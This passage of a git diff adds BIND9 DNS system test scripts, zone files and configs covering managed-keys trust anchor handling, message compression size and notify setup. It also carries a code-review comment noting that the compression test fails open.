xGk4FS/xSKfh89hO2O/H20Bzp0lMdtr2tKy8IMdU/mBZxQf2PXhUWRkg V2buVBKugTiOPTJSnaqYCN3rSfV1o7NtC1VNHKKK/D5g6bpDehdn5Gaq kpBhN+MSCCh9OZP2IT20luS1ARXxLlvuSVXJ3JYuuhTsQXUbX/SQpNoB Lo6ahCE55szJnmAxZEbb2KOVnSlZRA6ZBHDhdtO0S4OkvcmTutvcVV+7 w53CbKdaXhirvHIh0mZXmYk2PbPLDY7PU9wSH40UiWPOB9f00wwn6hUe uEQ1Qg==" +# Less than a second may have passed since ns1 was started. 
If we call +# dnssec-signzone immediately, ns1/root.db.signed will not be reloaded by the +# subsequent "rndc reload ." call on platforms which do not set the +# "nanoseconds" field of isc_time_t, due to zone load time being seemingly +# equal to master file modification time. +sleep 1 +sed -e "/ $rkeyid \./s, \. .*$, . $BADSIG," signer.out.$n > ns1/root.db.signed +mkeys_reload_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +# one key listed +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 1 ] || { echo_i "'keyid:' count ($count) != 1"; ret=1; } +# it's the original key id +count=$(grep -c "keyid: $originalid" rndc.out.$n) || true +[ "$count" -eq 1 ] || { echo_i "'keyid: $originalid' count ($count) != 1"; ret=1; } +# not revoked +count=$(grep -c "REVOKE" rndc.out.$n) || true +[ "$count" -eq 0 ] || { echo_i "'REVOKE' count ($count) != 0"; ret=1; } +# trust is still current +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 1 ] || { echo_i "'trust' count != 1"; ret=1; } +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 1 ] || { echo_i "'trusted since' count != 1"; ret=1; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check validation fails with bad DNSKEY rrset ($n)" +ret=0 +mkeys_flush_on 2 || ret=1 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "status: SERVFAIL" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "restore DNSKEY rrset, check validation succeeds again ($n)" +ret=0 +rm -f "${revoked}".key "${revoked}".private +rm -f ns1/root.db.signed.jnl +$SETTIME -D none -R none -K ns1 "$original" > /dev/null +$SETTIME -D now -K ns1 "$standby1" > /dev/null +# Less than a second may have passed since ns1 was started. 
If we call +# dnssec-signzone immediately, ns1/root.db.signed will not be reloaded by the +# subsequent "rndc reload ." call on platforms which do not set the +# "nanoseconds" field of isc_time_t, due to zone load time being seemingly +# equal to master file modification time. +sleep 1 +$SIGNER -Sg -K ns1 -N unixtime -o . ns1/root.db > /dev/null 2>/dev/null +mkeys_reload_on 1 || ret=1 +mkeys_flush_on 2 || ret=1 +dig_with_opts +noauth example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +if [ ! "$CYGWIN" ]; then + n=$((n+1)) + echo_i "reset the root server with no keys, check for minimal update ($n)" + ret=0 + # Refresh keys first to prevent previous checks from influencing this one. + # Note that we might still get occasional false negatives on some really slow + # machines, when $t1 equals $t2 due to the time elapsed between "rndc + # managed-keys status" calls being equal to the normal active refresh period + # (as calculated per rules listed in RFC 5011 section 2.3) minus an "hour" (as + # set using -T mkeytimers). 
+ mkeys_refresh_on 2 || ret=1 + mkeys_status_on 2 > rndc.out.1.$n 2>&1 || ret=1 + t1=$(grep 'next refresh:' rndc.out.1.$n) || true + stop_server --use-rndc --port "${CONTROLPORT}" ns1 + rm -f ns1/root.db.signed.jnl + cp ns1/root.db ns1/root.db.signed + nextpart ns1/named.run > /dev/null + start_server --noclean --restart --port "${PORT}" ns1 + wait_for_log 20 "all zones loaded" ns1/named.run || ret=1 + mkeys_refresh_on 2 || ret=1 + mkeys_status_on 2 > rndc.out.2.$n 2>&1 || ret=1 + # one key listed + count=$(grep -c "keyid: " rndc.out.2.$n) || true + [ "$count" -eq 1 ] || ret=1 + # it's the original key id + count=$(grep -c "keyid: $originalid" rndc.out.2.$n) || true + [ "$count" -eq 1 ] || ret=1 + # not revoked + count=$(grep -c "REVOKE" rndc.out.2.$n) || true + [ "$count" -eq 0 ] || ret=1 + # trust is still current + count=$(grep -c "trust" rndc.out.2.$n) || true + [ "$count" -eq 1 ] || ret=1 + count=$(grep -c "trusted since" rndc.out.2.$n) || true + [ "$count" -eq 1 ] || ret=1 + t2=$(grep 'next refresh:' rndc.out.2.$n) || true + [ "$t1" = "$t2" ] && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +fi + +n=$((n+1)) +echo_i "reset the root server with no signatures, check for minimal update ($n)" +ret=0 +# Refresh keys first to prevent previous checks from influencing this one +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.1.$n 2>&1 || ret=1 +t1=$(grep 'next refresh:' rndc.out.1.$n) || true +stop_server --use-rndc --port "${CONTROLPORT}" ns1 +rm -f ns1/root.db.signed.jnl +cat ns1/K*.key >> ns1/root.db.signed +nextpart ns1/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns1 +wait_for_log 20 "all zones loaded" ns1/named.run || ret=1 +# Less than a second may have passed since the last time ns2 received a +# ./DNSKEY response from ns1. Ensure keys are refreshed at a different +# timestamp to prevent minimal update from resetting it to the same timestamp. 
+sleep 1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.2.$n 2>&1 || ret=1 +# one key listed +count=$(grep -c "keyid: " rndc.out.2.$n) || true +[ "$count" -eq 1 ] || ret=1 +# it's the original key id +count=$(grep -c "keyid: $originalid" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || ret=1 +# not revoked +count=$(grep -c "REVOKE" rndc.out.2.$n) || true +[ "$count" -eq 0 ] || ret=1 +# trust is still current +count=$(grep -c "trust" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || ret=1 +count=$(grep -c "trusted since" rndc.out.2.$n) || true +[ "$count" -eq 1 ] || ret=1 +t2=$(grep 'next refresh:' rndc.out.2.$n) || true +[ "$t1" = "$t2" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "restore root server, check validation succeeds again ($n)" +ret=0 +rm -f ns1/root.db.signed.jnl +$SIGNER -Sg -K ns1 -N unixtime -o . ns1/root.db > /dev/null 2>/dev/null +mkeys_reload_on 1 || ret=1 +mkeys_refresh_on 2 || ret=1 +mkeys_status_on 2 > rndc.out.$n 2>&1 || ret=1 +dig_with_opts +noauth example. 
@10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that trust-anchor-telemetry queries are logged ($n)" +ret=0 +grep "sending trust-anchor-telemetry query '_ta-[0-9a-f]*/NULL" ns2/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that trust-anchor-telemetry queries are received ($n)" +ret=0 +grep "query '_ta-[0-9a-f][0-9a-f]*/NULL/IN' approved" ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc-managed-keys destroy' ($n)" +ret=0 +rndccmd 10.53.0.2 managed-keys destroy | sed 's/^/ns2 /' | cat_i +mkeys_status_on 2 > rndc.out.1.$n 2>&1 || ret=1 +grep "no views with managed keys" rndc.out.1.$n > /dev/null || ret=1 +mkeys_reconfig_on 2 || ret=1 +check_root_trust_anchor_is_present_in_status() { + mkeys_status_on 2 > rndc.out.2.$n 2>&1 || return 1 + grep "name: \." rndc.out.2.$n > /dev/null || return 1 + return 0 +} +retry_quiet 5 check_root_trust_anchor_is_present_in_status || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that trust-anchor-telemetry queries contain the correct key ($n)" +ret=0 +# convert the hexadecimal key from the TAT query into decimal and +# compare against the known key. 
+tathex=$(grep "query '_ta-[0-9a-f][0-9a-f]*/NULL/IN' approved" ns1/named.run | awk '{print $6; exit 0}' | sed -e 's/(_ta-\([0-9a-f][0-9a-f]*\)):/\1/') || true +tatkey=$($PERL -e 'printf("%d\n", hex(@ARGV[0]));' "$tathex") +realkey=$(rndccmd 10.53.0.2 secroots - | sed -n "s#.*${DEFAULT_ALGORITHM}/\([0-9][0-9]*\) ; .*managed.*#\1#p") +[ "$tatkey" -eq "$realkey" ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check initialization fails if managed-keys can't be created ($n)" +ret=0 +mkeys_secroots_on 4 || ret=1 +grep '; initializing managed' ns4/named.secroots > /dev/null 2>&1 || ret=1 +grep '; managed' ns4/named.secroots > /dev/null 2>&1 && ret=1 +grep '; trusted' ns4/named.secroots > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check failure to contact root servers does not prevent key refreshes after restart ($n)" +ret=0 +# By the time we get here, ns5 should have attempted refreshing its managed +# keys. These attempts should fail as ns1 is configured to REFUSE all queries +# from ns5. Note that named1.args does not contain "-T mkeytimers"; this is to +# ensure key refresh retry will be scheduled to one actual hour after the first +# key refresh failure instead of just a few seconds, in order to prevent races +# between the next scheduled key refresh time and startup time of restarted ns5. +stop_server --use-rndc --port "${CONTROLPORT}" ns5 +nextpart ns5/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns5 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for '.':" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.tld':" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.foo':" ns5/named.run || ret=1 +# ns5/named.run will contain logs from both the old instance and the new +# instance. 
In order for the test to pass, both must attempt a fetch. +count=$(grep -c "Creating key fetch" ns5/named.run) || true +[ "$count" -lt 2 ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc managed-keys' and islands of trust root unreachable ($n)" +ret=0 +mkeys_sync_on 5 +mkeys_status_on 5 > rndc.out.$n 2>&1 || ret=1 +# there should be three keys listed now +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# three lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# one indicates current trust +count=$(grep -c "trusted since" rndc.out.$n) || true +[ "$count" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check key refreshes are resumed after root servers become available ($n)" +ret=0 +stop_server --use-rndc --port "${CONTROLPORT}" ns5 +# Prevent previous check from affecting this one +rm -f ns5/managed-keys.bind* +# named2.args adds "-T mkeytimers=2/20/40" to named1.args as we need to wait for +# an "hour" until keys are refreshed again after initial failure +cp ns5/named2.args ns5/named.args +nextpart ns5/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns5 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for '.': failure" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.tld': failure" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.foo': success" ns5/named.run || ret=1 +mkeys_secroots_on 5 || ret=1 +grep '; initializing managed' ns5/named.secroots > /dev/null 2>&1 || ret=1 +# ns1 should still REFUSE queries from ns5, so resolving should be impossible +dig_with_opts +noauth example. 
@10.53.0.5 txt > dig.out.ns5.a.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns5.a.test$n > /dev/null && ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns5.a.test$n > /dev/null && ret=1 +grep "status: SERVFAIL" dig.out.ns5.a.test$n > /dev/null || ret=1 +# Allow queries from ns5 to ns1 +copy_setports ns1/named3.conf.in ns1/named.conf +rm -f ns1/root.db.signed.jnl +nextpart ns5/named.run > /dev/null +mkeys_reconfig_on 1 || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for '.': success" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.tld': success" ns5/named.run || ret=1 +wait_for_log_peek 20 "Returned from key fetch in keyfetch_done() for 'sub.foo': success" ns5/named.run || ret=1 +mkeys_secroots_on 5 || ret=1 +grep '; managed' ns5/named.secroots > /dev/null || ret=1 +# ns1 should not longer REFUSE queries from ns5, so managed keys should be +# correctly refreshed and resolving should succeed +dig_with_opts +noauth example. 
@10.53.0.5 txt > dig.out.ns5.b.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns5.b.test$n > /dev/null || ret=1 +grep "example..*.RRSIG..*TXT" dig.out.ns5.b.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns5.b.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reinitialize trust anchors, add unsupported algorithm ($n)" +ret=0 +stop_server --use-rndc --port "${CONTROLPORT}" ns6 +rm -f ns6/managed-keys.bind* +nextpart ns6/named.run > /dev/null +start_server --noclean --restart --port "${PORT}" ns6 +# log when an unsupported algorithm is encountered during startup +wait_for_log 20 "ignoring initial-key for 'unsupported.': algorithm is unsupported" ns6/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "ignoring unsupported algorithm in managed-keys ($n)" +ret=0 +mkeys_status_on 6 > rndc.out.$n 2>&1 || ret=1 +# there should still be only two keys listed (for . and island.) +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 + +n=$((n+1)) +echo_i "introduce unsupported algorithm rollover in authoritative zone ($n)" +ret=0 +cp ns1/root.db ns1/root.db.orig +ksk=$(cat ns1/managed.key) +zsk=$(cat ns1/zone.key) +cat "ns1/${ksk}.key" "ns1/${zsk}.key" ns1/unsupported.key >> ns1/root.db +grep "\.[[:space:]]*IN[[:space:]]*DNSKEY[[:space:]]*257 3 255" ns1/root.db > /dev/null || ret=1 +$SIGNER -K ns1 -N unixtime -o . 
ns1/root.db "$ksk" "$zsk" > /dev/null 2>/dev/null || ret=1 +grep "DNSKEY.*257 3 255" ns1/root.db.signed > /dev/null || ret=1 +cp ns1/root.db.orig ns1/root.db +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "ignoring unsupported algorithm in rollover ($n)" +ret=0 +mkeys_reload_on 1 || ret=1 +mkeys_refresh_on 6 || ret=1 +mkeys_status_on 6 > rndc.out.$n 2>&1 || ret=1 +# there should still be only two keys listed (for . and island.) +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# two lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || true +[ "$count" -eq 2 ] || ret=1 +# log when an unsupported algorithm is encountered during rollover +wait_for_log 20 "Cannot compute tag for key in zone .: algorithm is unsupported" ns6/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc managed-keys' and views ($n)" +ret=0 +rndccmd 10.53.0.7 managed-keys refresh in view1 > rndc.out.ns7.view1.test$n || ret=1 +grep "refreshing managed keys for 'view1'" rndc.out.ns7.view1.test$n > /dev/null || ret=1 +lines=$(wc -l < rndc.out.ns7.view1.test$n) +[ "$lines" -eq 1 ] || ret=1 +rndccmd 10.53.0.7 managed-keys refresh > rndc.out.ns7.view2.test$n || ret=1 +lines=$(wc -l < rndc.out.ns7.view2.test$n) +grep "refreshing managed keys for 'view1'" rndc.out.ns7.view2.test$n > /dev/null || ret=1 +grep "refreshing managed keys for 'view2'" rndc.out.ns7.view2.test$n > /dev/null || ret=1 +[ "$lines" -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc managed-keys' and islands of trust now that root is reachable ($n)" +ret=0 +mkeys_sync_on 5 +mkeys_status_on 5 > rndc.out.$n 2>&1 || ret=1 +# there should be three keys listed now +count=$(grep -c "keyid: " rndc.out.$n) || true +[ "$count" -eq 3 ] || ret=1 +# theee lines indicating trust status +count=$(grep -c "trust" rndc.out.$n) || 
true
+[ "$count" -eq 3 ] || ret=1
+# three indicates current trust
+count=$(grep -c "trusted since" rndc.out.$n) || true
+[ "$count" -eq 3 ] || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/names/clean.sh b/bin/tests/system/names/clean.sh
new file mode 100644
index 0000000..1f8371b
--- /dev/null
+++ b/bin/tests/system/names/clean.sh
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.*.test*
+rm -f ns*/named.lock
+rm -f ns*/named.memstats
+rm -f ns*/named.run
+rm -f ns*/named.pid
+rm -f ns*/named.conf
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
diff --git a/bin/tests/system/names/ns1/example.db b/bin/tests/system/names/ns1/example.db
new file mode 100644
index 0000000..a3e9f90
--- /dev/null
+++ b/bin/tests/system/names/ns1/example.db
@@ -0,0 +1,50 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns1
+ns1 A 10.53.0.1
+@ MX 0 m1.mail-servers.example.
+@ MX 0 m2.mail-servers.example.
+@ MX 0 m3.mail-servers.example.
+@ MX 0 m4.mail-servers.example.
+@ MX 0 m5.mail-servers.example.
+@ MX 0 m6.mail-servers.example.
+@ MX 0 m7.mail-servers.example.
+@ MX 0 m8.mail-servers.example.
+@ MX 0 m9.mail-servers.example.
+@ MX 0 m10.mail-servers.example.
+@ MX 0 m11.mail-servers.example.
+@ MX 0 m12.mail-servers.example.
+@ MX 0 m13.mail-servers.example.
+@ MX 0 m14.mail-servers.example.
+@ MX 0 m15.mail-servers.example.
+@ MX 0 m16.mail-servers.example.
+@ MX 0 m17.mail-servers.example.
+@ MX 0 m18.mail-servers.example.
+@ MX 0 m19.mail-servers.example.
+@ MX 0 m20.mail-servers.example.
+@ MX 0 m21.mail-servers.example.
+@ MX 0 m22.mail-servers.example.
+@ MX 0 m23.mail-servers.example.
+@ MX 0 m24.mail-servers.example.
+@ MX 0 m25.mail-servers.example.
+@ MX 0 m26.mail-servers.example.
+@ MX 0 m27.mail-servers.example.
+@ MX 0 m28.mail-servers.example.
+@ MX 0 m29.mail-servers.example.
diff --git a/bin/tests/system/names/ns1/named.conf.in b/bin/tests/system/names/ns1/named.conf.in
new file mode 100644
index 0000000..50211bc
--- /dev/null
+++ b/bin/tests/system/names/ns1/named.conf.in
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ ixfr-from-differences yes;
+ check-integrity no;
+};
+
+
+view compress {
+ match-clients { 10.53.0.1/32; };
+ zone "example" {
+ type primary;
+ file "example.db";
+ };
+};
+
+view nocompress {
+ match-clients { 10.53.0.2/32; };
+ message-compression no;
+ zone "example" {
+ type primary;
+ file "example.db";
+ };
+};
diff --git a/bin/tests/system/names/setup.sh b/bin/tests/system/names/setup.sh
new file mode 100644
index 0000000..e46affa
--- /dev/null
+++ b/bin/tests/system/names/setup.sh
@@ -0,0 +1,17 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/names/tests.sh b/bin/tests/system/names/tests.sh
new file mode 100644
index 0000000..1718830
--- /dev/null
+++ b/bin/tests/system/names/tests.sh
@@ -0,0 +1,48 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+DIGOPTS="+nosea +stat +noquest +nocomm +nocmd -p ${PORT}"
+
+status=0
+
+echo_i "Getting message size with compression enabled"
+$DIG $DIGOPTS -b 10.53.0.1 @10.53.0.1 mx example > dig.compen.test
+COMPEN=`grep ';; MSG SIZE' dig.compen.test |sed -e "s/.*: //g"`
+cat dig.compen.test |grep -v ';;' |sort > dig.compen.sorted.test
+
+echo_i "Getting message size with compression disabled"
+$DIG $DIGOPTS -b 10.53.0.2 @10.53.0.1 mx example > dig.compdis.test
+COMPDIS=`grep ';; MSG SIZE' dig.compdis.test |sed -e "s/.*: //g"`
+cat dig.compdis.test |grep -v ';;' |sort > dig.compdis.sorted.test
+
+# the compression disabled message should be at least twice as large as with
+# compression disabled, but the content should be the same
+echo_i "Checking if responses are identical other than in message size"
+$DIFF dig.compdis.sorted.test dig.compen.sorted.test >/dev/null
+ret=$?
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "Checking if message with compression disabled is significantly larger"
+echo_i "Disabled $COMPDIS vs enabled $COMPEN"
+val=`expr \( $COMPDIS \* 3 / 2 \) / $COMPEN`
+if [ $val -le 1 ]; then
+ echo_i "failed"
+ status=`expr $status + 1`
+fi;
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/notify/clean.sh b/bin/tests/system/notify/clean.sh
new file mode 100644
index 0000000..3e18850
--- /dev/null
+++ b/bin/tests/system/notify/clean.sh
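Review bot: The final size check in names/tests.sh fails open, because neither `$DIG` exit status is recorded and an empty or zero `$COMPEN`/`$COMPDIS` makes `expr` fail and leaves `$val` empty, so `[ $val -le 1 ]` errors out and the branch that bumps `status` is skipped. If both queries get no answer, the two sorted files presumably hold no non-`;;` lines, the `$DIFF` step succeeds as well, and the test reports success without having compared anything. I would record the query failures, e.g. `$DIG $DIGOPTS -b 10.53.0.1 @10.53.0.1 mx example > dig.compen.test || status=1` (same for the 10.53.0.2 query), and make the guard fail closed with `if [ "${val:-0}" -le 1 ]; then`. The comment above the `$DIFF` step also names "compression disabled" on both sides and promises "at least twice as large", while the arithmetic accepts a ratio of about 1.34; something like `# the compression-disabled message should be significantly larger than the compression-enabled one, but the content should be the same` would match the code.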
@@ -0,0 +1,39 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after zone transfer tests.
+#
+
+rm -f */named.conf
+rm -f */named.memstats
+rm -f */named.port
+rm -f */named.run */named.run.prev
+rm -f awk.out.ns?.test*
+rm -f dig.out.?.ns5.test*
+rm -f dig.out.ns2.test*
+rm -f dig.out.ns3.test*
+rm -f dig.out.ns4.test*
+rm -f log.out
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
+rm -f ns*/named.lock
+rm -f ns2/example.db
+rm -f ns2/x21.db*
+rm -f ns3/example.bk
+rm -f ns4/x21.bk*
+rm -f ns5/x21.bk-b
+rm -f ns5/x21.bk-b.jnl
+rm -f ns5/x21.bk-c
+rm -f ns5/x21.bk-c.jnl
+rm -f ns5/x21.db.jnl
+rm -f tmp
diff --git a/bin/tests/system/notify/ns1/named.conf.in b/bin/tests/system/notify/ns1/named.conf.in
new file mode 100644
index 0000000..eb079c9
--- /dev/null
+++ b/bin/tests/system/notify/ns1/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/notify/ns1/root.db b/bin/tests/system/notify/ns1/root.db
new file mode 100644
index 0000000..17780d1
--- /dev/null
+++ b/bin/tests/system/notify/ns1/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/notify/ns2/example1.db b/bin/tests/system/notify/ns2/example1.db
new file mode 100644
index 0000000..3b8d33b
--- /dev/null
+++ b/bin/tests/system/notify/ns2/example1.db
@@ -0,0 +1,144 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.0.0.1 +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + 